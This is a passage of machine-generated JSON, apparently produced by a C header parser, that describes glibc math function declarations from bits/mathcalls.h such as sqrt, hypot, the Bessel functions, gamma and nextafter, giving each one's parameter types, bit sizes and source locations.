"variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "sqrt", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:143:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:143:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__sqrt", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:143:1 <Spelling=<scratch space>:92:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "hypot", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:147:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:147:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__hypot", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:147:1 <Spelling=<scratch space>:93:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "cbrt", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:152:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:152:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__cbrt", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:152:1 <Spelling=<scratch space>:94:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "ceil", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:159:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:159:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__ceil", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:159:1 <Spelling=<scratch space>:95:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fabs", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:162:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:162:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fabs", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:162:1 <Spelling=<scratch space>:96:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "floor", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:165:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:165:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__floor", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:165:1 <Spelling=<scratch space>:97:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "fmod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:168:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:168:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__fmod", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:168:1 <Spelling=<scratch space>:98:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "isinf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:177:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:177:19>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "finite", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:182:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:182:19>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "drem", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:185:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:185:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__drem", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:185:1 <Spelling=<scratch space>:99:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "significand", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:189:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:189:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__significand", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:189:1 <Spelling=<scratch space>:100:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "copysign", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:196:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:196:14>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__copysign", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:196:1 <Spelling=<scratch space>:101:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "nan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:201:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:201:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tagb", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__nan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:201:1 <Spelling=<scratch space>:102:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__tagb", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "isnan", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:211:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:211:19>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__value", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "j0", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:217:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:217:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__j0", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:217:1 <Spelling=<scratch space>:103:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "j1", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:218:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:218:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__j1", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:218:1 <Spelling=<scratch space>:104:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "jn", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:219:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:219:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__jn", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:219:1 <Spelling=<scratch space>:105:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "y0", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:220:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:220:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__y0", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:220:1 <Spelling=<scratch space>:106:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "y1", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:221:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:221:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__y1", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:221:1 <Spelling=<scratch space>:107:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "yn", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:222:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:222:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__yn", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:222:1 <Spelling=<scratch space>:108:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "erf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:228:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:228:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__erf", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:228:1 <Spelling=<scratch space>:109:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "erfc", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:229:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:229:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__erfc", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:229:1 <Spelling=<scratch space>:110:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lgamma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:230:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:230:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lgamma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:230:1 <Spelling=<scratch space>:111:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "tgamma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:235:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:235:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__tgamma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:235:1 <Spelling=<scratch space>:112:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "gamma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:241:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:241:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__gamma", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:241:1 <Spelling=<scratch space>:113:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "lgamma_r", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:249:1 <Spelling=<scratch space>:114:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__signgamp", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lgamma_r", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:249:1 <Spelling=<scratch space>:116:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__signgamp", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "rint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:256:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:256:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__rint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:256:1 <Spelling=<scratch space>:117:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "nextafter", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:259:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:259:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__nextafter", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:259:1 <Spelling=<scratch space>:118:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "nexttoward", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:261:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:261:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__nexttoward", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:261:1 <Spelling=<scratch space>:119:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":long-double", "bit-size": 128, "bit-alignment": 128 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "remainder", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:272:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:272:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__remainder", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:272:1 <Spelling=<scratch space>:121:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__y", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "scalbn", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:276:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:276:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__scalbn", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:276:1 <Spelling=<scratch space>:122:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "ilogb", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:280:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:280:17>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "__ilogb", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:280:1 <Spelling=<scratch space>:123:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "scalbln", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:290:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:290:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__scalbln", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:290:1 <Spelling=<scratch space>:125:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__n", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "nearbyint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:294:1 <Spelling=/usr/include/x86_64-linux-gnu/bits/mathcalls.h:294:13>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__nearbyint", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/mathcalls.h:294:1 <Spelling=<scratch space>:126:1>", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 